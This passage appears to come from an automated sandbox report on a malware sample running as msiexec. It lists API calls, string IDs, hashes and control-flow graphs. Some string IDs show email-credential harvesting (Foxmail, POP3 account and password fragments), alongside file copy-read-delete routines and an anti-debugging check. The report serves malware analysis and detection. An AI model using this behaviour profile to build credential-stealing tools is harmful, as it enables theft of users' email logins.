                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: a1babf7aed26cf5b23162dbf5d579cbf14b79a8b77a772974104d1693a833b93
                                                              • Instruction ID: 010dd935b93d1ee36238af5be82f0595e63dd6028f2782ef3fb00ce0d169bda6
                                                              • Opcode Fuzzy Hash: a1babf7aed26cf5b23162dbf5d579cbf14b79a8b77a772974104d1693a833b93
                                                              • Instruction Fuzzy Hash: 1E81C871A4036DAADB20DBA1DC85FEF7379EF54700F00059AFA08E7191EA715B84CB95
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 212061DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 212061E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 212061F1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: e89e02d1ae8f921d3f56d17a4337605e1c6bc67cef313162e6132bea482f1462
                                                              • Instruction ID: d8221842cc029d7b0dd777306e2b90834aac0ec2c8834e76b0c48dc1610452dc
                                                              • Opcode Fuzzy Hash: e89e02d1ae8f921d3f56d17a4337605e1c6bc67cef313162e6132bea482f1462
                                                              • Instruction Fuzzy Hash: 9031F37494122D9BCB21DF64CD8879DBBB8EF18310F1042DAF91CA7260EB749B818F44
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000,?,21202082,21212108,0000000C,21201F3A,?), ref: 21204AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000,?,21202082,21212108,0000000C,21201F3A,?), ref: 21204ADC
                                                              • ExitProcess.KERNEL32 ref: 21204AEE
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 61a11c9e7b457be158151b914c211817953bb1101759c4cf92fe684c9f4a92e4
                                                              • Instruction ID: 13a739a474e90c329985fef8250e320527219c0ab2077cb476c5fe828e321d04
                                                              • Opcode Fuzzy Hash: 61a11c9e7b457be158151b914c211817953bb1101759c4cf92fe684c9f4a92e4
                                                              • Instruction Fuzzy Hash: E0E04F35041259AFCF01AF15CD0CA593F2AFF21381B008214FA4847021DB3AE982CB44
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 6b05292edb24816ddafcfa39bc348cd2fafae215be2657bacb766311cc726e0a
                                                              • Instruction ID: 88b214e6a056483351b09027ed13248c19ecff5803fa4c7342dabd13046e02c7
                                                              • Opcode Fuzzy Hash: 6b05292edb24816ddafcfa39bc348cd2fafae215be2657bacb766311cc726e0a
                                                              • Instruction Fuzzy Hash: 03A011302822028F8B00CE30830E20E3AAEAA003E03000228B80CC0000EB2A80008B00

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 21201CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D1B
                                                                • Part of subcall function 21201CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21201D37
                                                                • Part of subcall function 21201CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D4B
                                                              • _strlen.LIBCMT ref: 21201855
                                                              • _strlen.LIBCMT ref: 21201869
                                                              • _strlen.LIBCMT ref: 2120188B
                                                              • _strlen.LIBCMT ref: 212018AE
                                                              • _strlen.LIBCMT ref: 212018C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: f2d1788a41707a342b0ec88e606525b70e69e10c1ea7ccf3a8efc4daec6d87c0
                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: 6A61DA71D0022EAFEF15CBE4CC40BEEBBB9AF65300F40465AF204A7255DB74AA45CB55

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: e5418f9b887e2e5916d2c270fa9804fc6cdf9144322fab532fd5a67656b9a645
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: FB71D571D0026A5FDB119BA49C94BEF7BFC9B25340F10419AF644D7241E674E785CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 203 21207cc2-21207cd6 204 21207d44-21207d4c 203->204 205 21207cd8-21207cdd 203->205 207 21207d93-21207dab call 21207e35 204->207 208 21207d4e-21207d51 204->208 205->204 206 21207cdf-21207ce4 205->206 206->204 209 21207ce6-21207ce9 206->209 217 21207dae-21207db5 207->217 208->207 211 21207d53-21207d90 call 2120571e * 4 208->211 209->204 212 21207ceb-21207cf3 209->212 211->207 215 21207cf5-21207cf8 212->215 216 21207d0d-21207d15 212->216 215->216 219 21207cfa-21207d0c call 2120571e call 212090ba 215->219 222 21207d17-21207d1a 216->222 223 21207d2f-21207d43 call 2120571e * 2 216->223 220 21207dd4-21207dd8 217->220 221 21207db7-21207dbb 217->221 219->216 225 21207df0-21207dfc 220->225 226 21207dda-21207ddf 220->226 229 21207dd1 221->229 230 21207dbd-21207dc0 221->230 222->223 231 21207d1c-21207d2e call 2120571e call 212091b8 222->231 223->204 225->217 236 21207dfe-21207e0b call 2120571e 225->236 233 21207de1-21207de4 226->233 234 21207ded 226->234 229->220 230->229 238 21207dc2-21207dd0 call 2120571e * 2 230->238 231->223 233->234 243 21207de6-21207dec call 2120571e 233->243 234->225 238->229 243->234
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 21207D06
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212090D7
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212090E9
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212090FB
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120910D
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120911F
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209131
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209143
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209155
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209167
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 21209179
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120918B
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 2120919D
                                                                • Part of subcall function 212090BA: _free.LIBCMT ref: 212091AF
                                                              • _free.LIBCMT ref: 21207CFB
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 21207D1D
                                                              • _free.LIBCMT ref: 21207D32
                                                              • _free.LIBCMT ref: 21207D3D
                                                              • _free.LIBCMT ref: 21207D5F
                                                              • _free.LIBCMT ref: 21207D72
                                                              • _free.LIBCMT ref: 21207D80
                                                              • _free.LIBCMT ref: 21207D8B
                                                              • _free.LIBCMT ref: 21207DC3
                                                              • _free.LIBCMT ref: 21207DCA
                                                              • _free.LIBCMT ref: 21207DE7
                                                              • _free.LIBCMT ref: 21207DFF
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: bfb479e2a64ca046a6d360d862c02125eae95bd4044c661ca6f3fc82733cebbf
                                                              • Instruction ID: 5994b8c38ca339443640b2e446a3ac63b8c5eeec8c7325ec7181f59044dd4fec
                                                              • Opcode Fuzzy Hash: bfb479e2a64ca046a6d360d862c02125eae95bd4044c661ca6f3fc82733cebbf
                                                              • Instruction Fuzzy Hash: 77315E32600246DFEB259B38DD40B667BEEEF22310F104669FA89D7165DF31B980DB14

                                                              Control-flow Graph

                                                              APIs
                                                              • _free.LIBCMT ref: 212059EA
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 212059F6
                                                              • _free.LIBCMT ref: 21205A01
                                                              • _free.LIBCMT ref: 21205A0C
                                                              • _free.LIBCMT ref: 21205A17
                                                              • _free.LIBCMT ref: 21205A22
                                                              • _free.LIBCMT ref: 21205A2D
                                                              • _free.LIBCMT ref: 21205A38
                                                              • _free.LIBCMT ref: 21205A43
                                                              • _free.LIBCMT ref: 21205A51
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: df8b6ea64f62b35fc1991b1927547855cd4c8f19c6835d8b362154902cdee29c
                                                              • Instruction ID: f6d72552699628432b7c98fd7d1be30a9289cefa0eb790445be636208f4b47fa
                                                              • Opcode Fuzzy Hash: df8b6ea64f62b35fc1991b1927547855cd4c8f19c6835d8b362154902cdee29c
                                                              • Instruction Fuzzy Hash: 4211747A520149EFCB15DF58CC41CED3FADEF24350B5542A5BE088B239DA32EE50AB84

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 287 2120aa53-2120aa6e 288 2120aa80 287->288 289 2120aa70-2120aa7e RtlDecodePointer 287->289 290 2120aa85-2120aa8b 288->290 289->290 291 2120aa91 290->291 292 2120abb2-2120abb5 290->292 293 2120aba6 291->293 294 2120aa97-2120aa9a 291->294 295 2120ac12 292->295 296 2120abb7-2120abba 292->296 299 2120aba8-2120abad 293->299 300 2120aaa0 294->300 301 2120ab47-2120ab4a 294->301 302 2120ac19 295->302 297 2120ac06 296->297 298 2120abbc-2120abbf 296->298 297->295 306 2120abc1-2120abc4 298->306 307 2120abfa 298->307 310 2120ac5b-2120ac6a call 21202ada 299->310 303 2120ab34-2120ab42 300->303 304 2120aaa6-2120aaab 300->304 308 2120ab4c-2120ab4f 301->308 309 2120ab9d-2120aba4 301->309 305 2120ac20-2120ac49 302->305 303->305 311 2120ab25-2120ab2f 304->311 312 2120aaad-2120aab0 304->312 334 2120ac56-2120ac59 305->334 335 2120ac4b-2120ac50 call 21206368 305->335 313 2120abc6-2120abc9 306->313 314 2120abee 306->314 307->297 315 2120ab51-2120ab54 308->315 316 2120ab94-2120ab9b 308->316 318 2120ab61-2120ab8f 309->318 311->305 319 2120aab2-2120aab5 312->319 320 2120ab1c-2120ab23 312->320 322 2120abe2 313->322 323 2120abcb-2120abd0 313->323 314->307 315->310 324 2120ab5a 315->324 316->302 318->334 326 2120aab7-2120aaba 319->326 327 2120ab0d-2120ab17 319->327 331 2120aac7-2120aaf7 320->331 322->314 328 2120abd2-2120abd5 323->328 329 2120abdb-2120abe0 323->329 324->318 326->310 332 2120aac0 326->332 327->305 328->310 328->329 329->299 331->334 341 2120aafd-2120ab08 call 21206368 331->341 332->331 334->310 335->334 341->334
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: DecodePointer
                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                              • API String ID: 3527080286-3064271455
                                                              • Opcode ID: 789b1e2a6df6362537e16557bfc59a139fdc06e1254ac00904265388cef3b12a
                                                              • Instruction ID: 5597838068193d11c86cd61645ccb7adcca502e1d0893cb6157af65e317506bc
                                                              • Opcode Fuzzy Hash: 789b1e2a6df6362537e16557bfc59a139fdc06e1254ac00904265388cef3b12a
                                                              • Instruction Fuzzy Hash: 05518D7090091ACBDF00CFA4DD885ECBFB5FB2A310F914789F680A7655DB768A64CB14

                                                              Control-flow Graph

                                                              APIs
                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D1B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21201D37
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D4B
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D58
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D8A
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: 206eb4228462af133a982404b130089416315ec2f065af5911dfc4132e77cda4
                                                              • Instruction ID: 60025998c7ad19ef57daa4cdf0bd9646680c70738571a3bda5ef448f54e93e0b
                                                              • Opcode Fuzzy Hash: 206eb4228462af133a982404b130089416315ec2f065af5911dfc4132e77cda4
                                                              • Instruction Fuzzy Hash: 0D21FCB194222DAFE710EBA08CCCFFB76BCEB29395F000665F615D2140D6759E458B70

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 361 21209492-212094ef GetConsoleCP 362 21209632-21209644 call 21202ada 361->362 363 212094f5-21209511 361->363 364 21209513-2120952a 363->364 365 2120952c-2120953d call 21207c19 363->365 367 21209566-21209575 call 212079e6 364->367 372 21209563-21209565 365->372 373 2120953f-21209542 365->373 367->362 375 2120957b-2120959b WideCharToMultiByte 367->375 372->367 376 21209548-2120955a call 212079e6 373->376 377 21209609-21209628 373->377 375->362 378 212095a1-212095b7 WriteFile 375->378 376->362 384 21209560-21209561 376->384 377->362 380 212095b9-212095ca 378->380 381 2120962a-21209630 GetLastError 378->381 380->362 383 212095cc-212095d0 380->383 381->362 385 212095d2-212095f0 WriteFile 383->385 386 212095fe-21209601 383->386 384->375 385->381 387 212095f2-212095f6 385->387 386->363 388 21209607 386->388 387->362 389 212095f8-212095fb 387->389 388->362 389->386
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21209C07,?,00000000,?,00000000,00000000), ref: 212094D4
                                                              • __fassign.LIBCMT ref: 2120954F
                                                              • __fassign.LIBCMT ref: 2120956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 21209590
                                                              • WriteFile.KERNEL32(?,?,00000000,21209C07,00000000,?,?,?,?,?,?,?,?,?,21209C07,?), ref: 212095AF
                                                              • WriteFile.KERNEL32(?,?,?,21209C07,00000000,?,?,?,?,?,?,?,?,?,21209C07,?), ref: 212095E8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 6fae25692be3753174f17aef85d0dd44f0c439ea60e2a2ce7da439900de47f13
                                                              • Instruction ID: 64838f62df333234a9e0ad9fc121f6428e3149c2fa50f24c3ac391c86ed3f7be
                                                              • Opcode Fuzzy Hash: 6fae25692be3753174f17aef85d0dd44f0c439ea60e2a2ce7da439900de47f13
                                                              • Instruction Fuzzy Hash: 73519171900209AFDF00CFA4DC95AEEBBF9EF29310F14421AF666F7281D631A941CB60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 390 21203370-212033b5 call 21203330 call 212037a7 395 21203416-21203419 390->395 396 212033b7-212033c9 390->396 397 21203439-21203442 395->397 398 2120341b-21203428 call 21203790 395->398 396->397 399 212033cb 396->399 402 2120342d-21203436 call 21203330 398->402 401 212033d0-212033e7 399->401 403 212033e9-212033f7 call 21203740 401->403 404 212033fd 401->404 402->397 412 212033f9 403->412 413 2120340d-21203414 403->413 407 21203400-21203405 404->407 407->401 410 21203407-21203409 407->410 410->397 411 2120340b 410->411 411->402 414 21203443-2120344c 412->414 415 212033fb 412->415 413->402 416 21203486-21203496 call 21203774 414->416 417 2120344e-21203455 414->417 415->407 422 21203498-212034a7 call 21203790 416->422 423 212034aa-212034c6 call 21203330 call 21203758 416->423 417->416 419 21203457-21203466 call 2120bbe0 417->419 427 21203483 419->427 428 21203468-21203480 419->428 422->423 427->416 428->427
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 2120339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 212033A3
                                                              • _ValidateLocalCookies.LIBCMT ref: 21203431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 2120345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 212034B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 570bf8ffe41b41172c1abd8ff59ee9cdc49cd0e5b934e2ef9c9b36469e13efcf
                                                              • Instruction ID: 0475589208d819819873293309286261395284277d4ee44b5026bdecdb0cb721
                                                              • Opcode Fuzzy Hash: 570bf8ffe41b41172c1abd8ff59ee9cdc49cd0e5b934e2ef9c9b36469e13efcf
                                                              • Instruction Fuzzy Hash: E141C538E0820A9FCB05CF68CD84A9FBBB5EF65324F118259FA149B351D735EA01CB90

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 21209221: _free.LIBCMT ref: 2120924A
                                                              • _free.LIBCMT ref: 212092AB
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 212092B6
                                                              • _free.LIBCMT ref: 212092C1
                                                              • _free.LIBCMT ref: 21209315
                                                              • _free.LIBCMT ref: 21209320
                                                              • _free.LIBCMT ref: 2120932B
                                                              • _free.LIBCMT ref: 21209336
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 0fa449960e46f36df9bb3a3627d9186a4606aceeb8f20a1c6cb1f9f635a1b9c8
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: 8A118E31544B09FEDB20AFB0DC45FEB7B9DAF34700F400A24BA9EB60A2DA24B5249751

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 472 21208821-2120883a 473 21208850-21208855 472->473 474 2120883c-2120884c call 21209341 472->474 476 21208862-21208886 MultiByteToWideChar 473->476 477 21208857-2120885f 473->477 474->473 481 2120884e 474->481 479 21208a19-21208a2c call 21202ada 476->479 480 2120888c-21208898 476->480 477->476 482 2120889a-212088ab 480->482 483 212088ec 480->483 481->473 487 212088ca-212088db call 212056d0 482->487 488 212088ad-212088bc call 2120bf20 482->488 486 212088ee-212088f0 483->486 490 212088f6-21208909 MultiByteToWideChar 486->490 491 21208a0e 486->491 487->491 498 212088e1 487->498 488->491 497 212088c2-212088c8 488->497 490->491 495 2120890f-2120892a call 21205f19 490->495 496 21208a10-21208a17 call 21208801 491->496 495->491 504 21208930-21208937 495->504 496->479 501 212088e7-212088ea 497->501 498->501 501->486 505 21208971-2120897d 504->505 506 21208939-2120893e 504->506 507 212089c9 505->507 508 2120897f-21208990 505->508 506->496 509 21208944-21208946 506->509 510 212089cb-212089cd 507->510 512 21208992-212089a1 call 2120bf20 508->512 513 212089ab-212089bc call 212056d0 508->513 509->491 511 2120894c-21208966 call 21205f19 509->511 514 21208a07-21208a0d call 21208801 510->514 515 212089cf-212089e8 call 21205f19 510->515 511->496 525 2120896c 511->525 512->514 527 212089a3-212089a9 512->527 513->514 528 212089be 513->528 514->491 515->514 529 212089ea-212089f1 515->529 525->491 530 212089c4-212089c7 527->530 528->530 531 212089f3-212089f4 529->531 532 21208a2d-21208a33 529->532 530->510 533 212089f5-21208a05 WideCharToMultiByte 531->533 532->533 533->514 534 21208a35-21208a3c call 21208801 533->534 534->496
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21206FFD,00000000,?,?,?,21208A72,?,?,00000100), ref: 2120887B
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,21208A72,?,?,00000100,5EFC4D8B,?,?), ref: 21208901
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 212089FB
                                                              • __freea.LIBCMT ref: 21208A08
                                                                • Part of subcall function 212056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21205702
                                                              • __freea.LIBCMT ref: 21208A11
                                                              • __freea.LIBCMT ref: 21208A36
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: f3e7af1f42f1b6268e72bda07ca128da4036e6c76918d1f48a779e1757279c6c
                                                              • Instruction ID: cea7b43dc74471ab0810ef32d00899935b16f671760ca941888903e42c968ad9
                                                              • Opcode Fuzzy Hash: f3e7af1f42f1b6268e72bda07ca128da4036e6c76918d1f48a779e1757279c6c
                                                              • Instruction Fuzzy Hash: FC51D372A1021BAFEB158E64DC45EBB3BAAEB65750F11473DFE04D6140EB35EC908B90

                                                              Control-flow Graph

                                                              APIs
                                                              • _strlen.LIBCMT ref: 21201607
                                                              • _strcat.LIBCMT ref: 2120161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2120190E,?,?,00000000,?,00000000), ref: 21201643
